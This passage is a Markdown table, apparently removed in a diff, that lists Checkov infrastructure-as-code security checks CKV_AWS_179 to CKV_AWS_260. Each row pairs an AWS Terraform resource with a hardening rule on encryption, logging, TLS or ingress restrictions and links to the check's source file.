-|  268 | CKV_AWS_179     | resource | aws_fsx_windows_file_system                             | Ensure FSX Windows filesystem is encrypted by KMS using a customer managed Key (CMK)                                                                                                                     | Terraform | [FSXWindowsFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXWindowsFSEncryptedWithCMK.py)                                                               |
-|  269 | CKV_AWS_180     | resource | aws_imagebuilder_component                              | Ensure Image Builder component is encrypted by KMS using a customer managed Key (CMK)                                                                                                                    | Terraform | [ImagebuilderComponentEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderComponentEncryptedWithCMK.py)                                             |
-|  270 | CKV_AWS_181     | resource | aws_s3_object_copy                                      | Ensure S3 Object Copy is encrypted by KMS using a customer managed Key (CMK)                                                                                                                             | Terraform | [S3ObjectCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ObjectCopyEncryptedWithCMK.py)                                                               |
-|  271 | CKV_AWS_182     | resource | aws_docdb_cluster                                       | Ensure DocumentDB is encrypted by KMS using a customer managed Key (CMK)                                                                                                                                 | Terraform | [DocDBEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryptedWithCMK.py)                                                                             |
-|  272 | CKV_AWS_183     | resource | aws_ebs_snapshot_copy                                   | Ensure EBS Snapshot Copy is encrypted by KMS using a customer managed Key (CMK)                                                                                                                          | Terraform | [EBSSnapshotCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSSnapshotCopyEncryptedWithCMK.py)                                                         |
-|  273 | CKV_AWS_184     | resource | aws_efs_file_system                                     | Ensure resource is encrypted by KMS using a customer managed Key (CMK)                                                                                                                                   | Terraform | [EFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSFileSystemEncryptedWithCMK.py)                                                             |
-|  274 | CKV_AWS_185     | resource | aws_kinesis_stream                                      | Ensure Kinesis Stream is encrypted by KMS using a customer managed Key (CMK)                                                                                                                             | Terraform | [KinesisStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptedWithCMK.py)                                                             |
-|  275 | CKV_AWS_186     | resource | aws_s3_bucket_object                                    | Ensure S3 bucket Object is encrypted by KMS using a customer managed Key (CMK)                                                                                                                           | Terraform | [S3BucketObjectEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectEncryptedWithCMK.py)                                                           |
-|  276 | CKV_AWS_187     | resource | aws_sagemaker_domain                                    | Ensure Sagemaker domain is encrypted by KMS using a customer managed Key (CMK)                                                                                                                           | Terraform | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py)                                                         |
-|  277 | CKV_AWS_189     | resource | aws_ebs_volume                                          | Ensure EBS Volume is encrypted by KMS using a customer managed Key (CMK)                                                                                                                                 | Terraform | [EBSVolumeEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSVolumeEncryptedWithCMK.py)                                                                     |
-|  278 | CKV_AWS_190     | resource | aws_fsx_lustre_file_system                              | Ensure lustre file systems is encrypted by KMS using a customer managed Key (CMK)                                                                                                                        | Terraform | [LustreFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LustreFSEncryptedWithCMK.py)                                                                       |
-|  279 | CKV_AWS_191     | resource | aws_elasticache_replication_group                       | Ensure ElastiCache replication group is encrypted by KMS using a customer managed Key (CMK)                                                                                                              | Terraform | [ElasticacheReplicationGroupEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptedWithCMK.py)                                 |
-|  280 | CKV_AWS_192     | resource | aws_wafv2_web_acl                                       | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                                          | Terraform | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py)                                                                                   |
-|  281 | CKV_AWS_193     | resource | aws_appsync_graphql_api                                 | Ensure AppSync has Logging enabled                                                                                                                                                                       | Terraform | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncLogging.py)                                                                                           |
-|  282 | CKV_AWS_194     | resource | aws_appsync_graphql_api                                 | Ensure AppSync has Field-Level logs enabled                                                                                                                                                              | Terraform | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncFieldLevelLogs.py)                                                                             |
-|  283 | CKV_AWS_195     | resource | aws_glue_crawler                                        | Ensure Glue component has a security configuration associated                                                                                                                                            | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                                       |
-|  284 | CKV_AWS_195     | resource | aws_glue_dev_endpoint                                   | Ensure Glue component has a security configuration associated                                                                                                                                            | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                                       |
-|  285 | CKV_AWS_195     | resource | aws_glue_job                                            | Ensure Glue component has a security configuration associated                                                                                                                                            | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                                       |
-|  286 | CKV_AWS_196     | resource | aws_elasticache_security_group                          | Ensure no aws_elasticache_security_group resources exist                                                                                                                                                 | Terraform | [ElasticacheHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheHasSecurityGroup.py)                                                                 |
-|  287 | CKV_AWS_197     | resource | aws_mq_broker                                           | Ensure MQ Broker Audit logging is enabled                                                                                                                                                                | Terraform | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerAuditLogging.py)                                                                               |
-|  288 | CKV_AWS_198     | resource | aws_db_security_group                                   | Ensure no aws_db_security_group resources exist                                                                                                                                                          | Terraform | [RDSHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSHasSecurityGroup.py)                                                                                 |
-|  289 | CKV_AWS_199     | resource | aws_imagebuilder_distribution_configuration             | Ensure Image Builder Distribution Configuration encrypts AMI's using KMS - a customer managed Key (CMK)                                                                                                  | Terraform | [ImagebuilderDistributionConfigurationEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderDistributionConfigurationEncryptedWithCMK.py)             |
-|  290 | CKV_AWS_200     | resource | aws_imagebuilder_image_recipe                           | Ensure that Image Recipe EBS Disk are encrypted with CMK                                                                                                                                                 | Terraform | [ImagebuilderImageRecipeEBSEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderImageRecipeEBSEncrypted.py)                                                 |
-|  291 | CKV_AWS_201     | resource | aws_memorydb_cluster                                    | Ensure MemoryDB is encrypted at rest using KMS CMKs                                                                                                                                                      | Terraform | [MemoryDBEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBEncryptionWithCMK.py)                                                                     |
-|  292 | CKV_AWS_202     | resource | aws_memorydb_cluster                                    | Ensure MemoryDB data is encrypted in transit                                                                                                                                                             | Terraform | [MemoryDBClusterIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBClusterIntransitEncryption.py)                                                   |
-|  293 | CKV_AWS_203     | resource | aws_fsx_openzfs_file_system                             | Ensure resource is encrypted by KMS using a customer managed Key (CMK)                                                                                                                                   | Terraform | [FSXOpenZFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOpenZFSFileSystemEncryptedWithCMK.py)                                               |
-|  294 | CKV_AWS_204     | resource | aws_ami                                                 | Ensure AMIs are encrypted using KMS CMKs                                                                                                                                                                 | Terraform | [AMIEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMIEncryption.py)                                                                                             |
-|  295 | CKV_AWS_205     | resource | aws_ami_launch_permission                               | Ensure to Limit AMI launch Permissions                                                                                                                                                                   | Terraform | [AMILaunchIsShared.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMILaunchIsShared.py)                                                                                     |
-|  296 | CKV_AWS_206     | resource | aws_api_gateway_domain_name                             | Ensure API Gateway Domain uses a modern security Policy                                                                                                                                                  | Terraform | [APIGatewayDomainNameTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDomainNameTLS.py)                                                                         |
-|  297 | CKV_AWS_207     | resource | aws_mq_broker                                           | Ensure MQ Broker minor version updates are enabled                                                                                                                                                       | Terraform | [MQBrokerMinorAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerMinorAutoUpgrade.py)                                                                       |
-|  298 | CKV_AWS_208     | resource | aws_mq_broker                                           | Ensure MQ Broker version is current                                                                                                                                                                      | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py)                                                                                         |
-|  299 | CKV_AWS_208     | resource | aws_mq_configuration                                    | Ensure MQ Broker version is current                                                                                                                                                                      | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py)                                                                                         |
-|  300 | CKV_AWS_209     | resource | aws_mq_broker                                           | Ensure MQ broker encrypted by KMS using a customer managed Key (CMK)                                                                                                                                     | Terraform | [MQBrokerEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerEncryptedWithCMK.py)                                                                       |
-|  301 | CKV_AWS_210     | resource | aws_batch_job_definition                                | Batch job does not define a privileged container                                                                                                                                                         | Terraform | [BatchJobIsNotPrivileged.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BatchJobIsNotPrivileged.py)                                                                         |
-|  302 | CKV_AWS_211     | resource | aws_db_instance                                         | Ensure RDS uses a modern CaCert                                                                                                                                                                          | Terraform | [RDSCACertIsRecent.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSCACertIsRecent.py)                                                                                     |
-|  303 | CKV_AWS_212     | resource | aws_dms_replication_instance                            | Ensure DMS replication instance is encrypted by KMS using a customer managed Key (CMK)                                                                                                                   | Terraform | [DMSReplicationInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceEncryptedWithCMK.py)                                           |
-|  304 | CKV_AWS_213     | resource | aws_load_balancer_policy                                | Ensure ELB Policy uses only secure protocols                                                                                                                                                             | Terraform | [ELBPolicyUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBPolicyUsesSecureProtocols.py)                                                               |
-|  305 | CKV_AWS_214     | resource | aws_appsync_api_cache                                   | Ensure AppSync API Cache is encrypted at rest                                                                                                                                                            | Terraform | [AppsyncAPICacheEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionAtRest.py)                                                         |
-|  306 | CKV_AWS_215     | resource | aws_appsync_api_cache                                   | Ensure AppSync API Cache is encrypted in transit                                                                                                                                                         | Terraform | [AppsyncAPICacheEncryptionInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionInTransit.py)                                                   |
-|  307 | CKV_AWS_216     | resource | aws_cloudfront_distribution                             | Ensure CloudFront distribution is enabled                                                                                                                                                                | Terraform | [CloudfrontDistributionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEnabled.py)                                                             |
-|  308 | CKV_AWS_217     | resource | aws_api_gateway_deployment                              | Ensure Create before destroy for API deployments                                                                                                                                                         | Terraform | [APIGatewayDeploymentCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDeploymentCreateBeforeDestroy.py)                                         |
-|  309 | CKV_AWS_218     | resource | aws_cloudsearch_domain                                  | Ensure that CloudSearch is using latest TLS                                                                                                                                                              | Terraform | [CloudsearchDomainTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainTLS.py)                                                                               |
-|  310 | CKV_AWS_219     | resource | aws_codepipeline                                        | Ensure CodePipeline Artifact store is using a KMS CMK                                                                                                                                                    | Terraform | [CodePipelineArtifactsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodePipelineArtifactsEncrypted.py)                                                           |
-|  311 | CKV_AWS_220     | resource | aws_cloudsearch_domain                                  | Ensure that CloudSearch is using https                                                                                                                                                                   | Terraform | [CloudsearchDomainEnforceHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainEnforceHttps.py)                                                             |
-|  312 | CKV_AWS_221     | resource | aws_codeartifact_domain                                 | Ensure CodeArtifact Domain is encrypted by KMS using a customer managed Key (CMK)                                                                                                                        | Terraform | [CodeArtifactDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeArtifactDomainEncryptedWithCMK.py)                                                   |
-|  313 | CKV_AWS_222     | resource | aws_dms_replication_instance                            | Ensure DMS replication instance gets all minor upgrade automatically                                                                                                                                     | Terraform | [DMSReplicationInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceMinorUpgrade.py)                                                   |
-|  314 | CKV_AWS_223     | resource | aws_ecs_cluster                                         | Ensure ECS Cluster enables logging of ECS Exec                                                                                                                                                           | Terraform | [ECSClusterLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEnabled.py)                                                                       |
-|  315 | CKV_AWS_224     | resource | aws_ecs_cluster                                         | Ensure ECS Cluster logging uses CMK                                                                                                                                                                      | Terraform | [ECSClusterLoggingEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py)                                                     |
-|  316 | CKV_AWS_225     | resource | aws_api_gateway_method_settings                         | Ensure API Gateway method setting caching is enabled                                                                                                                                                     | Terraform | [APIGatewayMethodSettingsCacheEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEnabled.py)                                               |
-|  317 | CKV_AWS_226     | resource | aws_db_instance                                         | Ensure DB instance gets all minor upgrades automatically                                                                                                                                                 | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py)                                                                           |
-|  318 | CKV_AWS_226     | resource | aws_rds_cluster_instance                                | Ensure DB instance gets all minor upgrades automatically                                                                                                                                                 | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py)                                                                           |
-|  319 | CKV_AWS_227     | resource | aws_kms_key                                             | Ensure KMS key is enabled                                                                                                                                                                                | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyIsEnabled.py)                                                                                         |
-|  320 | CKV_AWS_228     | resource | aws_elasticsearch_domain                                | Verify Elasticsearch domain is using an up to date TLS policy                                                                                                                                            | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py)                                                                           |
-|  321 | CKV_AWS_228     | resource | aws_opensearch_domain                                   | Verify Elasticsearch domain is using an up to date TLS policy                                                                                                                                            | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py)                                                                           |
-|  322 | CKV_AWS_229     | resource | aws_network_acl                                         | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21                                                                                                                                                   | Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py)                                                         |
-|  323 | CKV_AWS_229     | resource | aws_network_acl_rule                                    | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21                                                                                                                                                   | Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py)                                                         |
-|  324 | CKV_AWS_230     | resource | aws_network_acl                                         | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20                                                                                                                                                   | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py)                                                         |
-|  325 | CKV_AWS_230     | resource | aws_network_acl_rule                                    | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20                                                                                                                                                   | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py)                                                         |
-|  326 | CKV_AWS_231     | resource | aws_network_acl                                         | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                                 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py)                                                     |
-|  327 | CKV_AWS_231     | resource | aws_network_acl_rule                                    | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                                 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py)                                                     |
-|  328 | CKV_AWS_232     | resource | aws_network_acl                                         | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22                                                                                                                                                   | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py)                                                         |
-|  329 | CKV_AWS_232     | resource | aws_network_acl_rule                                    | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22                                                                                                                                                   | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py)                                                         |
-|  330 | CKV_AWS_233     | resource | aws_acm_certificate                                     | Ensure Create before destroy for ACM certificates                                                                                                                                                        | Terraform | [ACMCertCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertCreateBeforeDestroy.py)                                                                   |
-|  331 | CKV_AWS_234     | resource | aws_acm_certificate                                     | Verify logging preference for ACM certificates                                                                                                                                                           | Terraform | [ACMCertSetLoggingPreference.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertSetLoggingPreference.py)                                                                 |
-|  332 | CKV_AWS_235     | resource | aws_ami_copy                                            | Ensure that copied AMIs are encrypted                                                                                                                                                                    | Terraform | [AMICopyIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyIsEncrypted.py)                                                                                   |
-|  333 | CKV_AWS_236     | resource | aws_ami_copy                                            | Ensure AMI copying uses a CMK                                                                                                                                                                            | Terraform | [AMICopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyUsesCMK.py)                                                                                           |
-|  334 | CKV_AWS_237     | resource | aws_api_gateway_rest_api                                | Ensure Create before destroy for API Gateway                                                                                                                                                             | Terraform | [APIGatewayCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCreateBeforeDestroy.py)                                                             |
-|  335 | CKV_AWS_238     | resource | aws_guardduty_detector                                  | Ensure that GuardDuty detector is enabled                                                                                                                                                                | Terraform | [GuarddutyDetectorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GuarddutyDetectorEnabled.py)                                                                       |
-|  336 | CKV_AWS_239     | resource | aws_dax_cluster                                         | Ensure DAX cluster endpoint is using TLS                                                                                                                                                                 | Terraform | [DAXEndpointTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEndpointTLS.py)                                                                                           |
-|  337 | CKV_AWS_240     | resource | aws_kinesis_firehose_delivery_stream                    | Ensure Kinesis Firehose delivery stream is encrypted                                                                                                                                                     | Terraform | [KinesisFirehoseDeliveryStreamSSE.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamSSE.py)                                                       |
-|  338 | CKV_AWS_241     | resource | aws_kinesis_firehose_delivery_stream                    | Ensure that Kinesis Firehose Delivery Streams are encrypted with CMK                                                                                                                                     | Terraform | [KinesisFirehoseDeliveryStreamUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamUsesCMK.py)                                               |
-|  339 | CKV_AWS_242     | resource | aws_mwaa_environment                                    | Ensure MWAA environment has scheduler logs enabled                                                                                                                                                       | Terraform | [MWAASchedulerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAASchedulerLogsEnabled.py)                                                                       |
-|  340 | CKV_AWS_243     | resource | aws_mwaa_environment                                    | Ensure MWAA environment has worker logs enabled                                                                                                                                                          | Terraform | [MWAAWorkerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWorkerLogsEnabled.py)                                                                             |
-|  341 | CKV_AWS_244     | resource | aws_mwaa_environment                                    | Ensure MWAA environment has webserver logs enabled                                                                                                                                                       | Terraform | [MWAAWebserverLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWebserverLogsEnabled.py)                                                                       |
-|  342 | CKV_AWS_245     | resource | aws_db_instance_automated_backups_replication           | Ensure replicated backups are encrypted at rest using KMS CMKs                                                                                                                                           | Terraform | [RDSInstanceAutoBackupEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceAutoBackupEncryptionWithCMK.py)                                           |
-|  343 | CKV_AWS_246     | resource | aws_rds_cluster_activity_stream                         | Ensure RDS Cluster activity streams are encrypted using KMS CMKs                                                                                                                                         | Terraform | [RDSClusterActivityStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterActivityStreamEncryptedWithCMK.py)                                       |
-|  344 | CKV_AWS_247     | resource | aws_elasticsearch_domain                                | Ensure all data stored in the Elasticsearch is encrypted with a CMK                                                                                                                                      | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py)                                                           |
-|  345 | CKV_AWS_247     | resource | aws_opensearch_domain                                   | Ensure all data stored in the Elasticsearch is encrypted with a CMK                                                                                                                                      | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py)                                                           |
-|  346 | CKV_AWS_248     | resource | aws_elasticsearch_domain                                | Ensure that Elasticsearch is not using the default Security Group                                                                                                                                        | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py)                                                                           |
-|  347 | CKV_AWS_248     | resource | aws_opensearch_domain                                   | Ensure that Elasticsearch is not using the default Security Group                                                                                                                                        | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py)                                                                           |
-|  348 | CKV_AWS_249     | resource | aws_ecs_task_definition                                 | Ensure that the Execution Role ARN and the Task Role ARN are different in ECS Task definitions                                                                                                           | Terraform | [ECSTaskDefinitionRoleCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionRoleCheck.py)                                                                   |
-|  349 | CKV_AWS_250     | resource | aws_db_instance                                         | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/)                                          | Terraform | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py)                                                               |
-|  350 | CKV_AWS_250     | resource | aws_rds_cluster                                         | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/)                                          | Terraform | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py)                                                               |
-|  351 | CKV_AWS_251     | resource | aws_cloudtrail                                          | Ensure CloudTrail logging is enabled                                                                                                                                                                     | Terraform | [CloudtrailEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEnableLogging.py)                                                                         |
-|  352 | CKV_AWS_252     | resource | aws_cloudtrail                                          | Ensure CloudTrail defines an SNS Topic                                                                                                                                                                   | Terraform | [CloudtrailDefinesSNSTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailDefinesSNSTopic.py)                                                                     |
-|  353 | CKV_AWS_253     | resource | aws_dlm_lifecycle_policy                                | Ensure DLM cross region events are encrypted                                                                                                                                                             | Terraform | [DLMEventsCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryption.py)                                                           |
-|  354 | CKV_AWS_254     | resource | aws_dlm_lifecycle_policy                                | Ensure DLM cross region events are encrypted with Customer Managed Key                                                                                                                                   | Terraform | [DLMEventsCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryptionWithCMK.py)                                             |
-|  355 | CKV_AWS_255     | resource | aws_dlm_lifecycle_policy                                | Ensure DLM cross region schedules are encrypted                                                                                                                                                          | Terraform | [DLMScheduleCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryption.py)                                                       |
-|  356 | CKV_AWS_256     | resource | aws_dlm_lifecycle_policy                                | Ensure DLM cross region schedules are encrypted using a Customer Managed Key                                                                                                                             | Terraform | [DLMScheduleCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryptionWithCMK.py)                                         |
-|  357 | CKV_AWS_257     | resource | aws_codecommit_approval_rule_template                   | Ensure CodeCommit branch changes have at least 2 approvals                                                                                                                                               | Terraform | [CodecommitApprovalsRulesRequireMin2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodecommitApprovalsRulesRequireMin2.py)                                                 |
-|  358 | CKV_AWS_258     | resource | aws_lambda_function_url                                 | Ensure that Lambda function URLs AuthType is not None                                                                                                                                                    | Terraform | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionURLAuth.py)                                                                             |
-|  359 | CKV_AWS_259     | resource | aws_cloudfront_response_headers_policy                  | Ensure CloudFront response header policy enforces Strict Transport Security                                                                                                                              | Terraform | [CloudFrontResponseHeaderStrictTransportSecurity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudFrontResponseHeaderStrictTransportSecurity.py)                         |
-|  360 | CKV_AWS_260     | resource | aws_security_group                                      | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                                   |
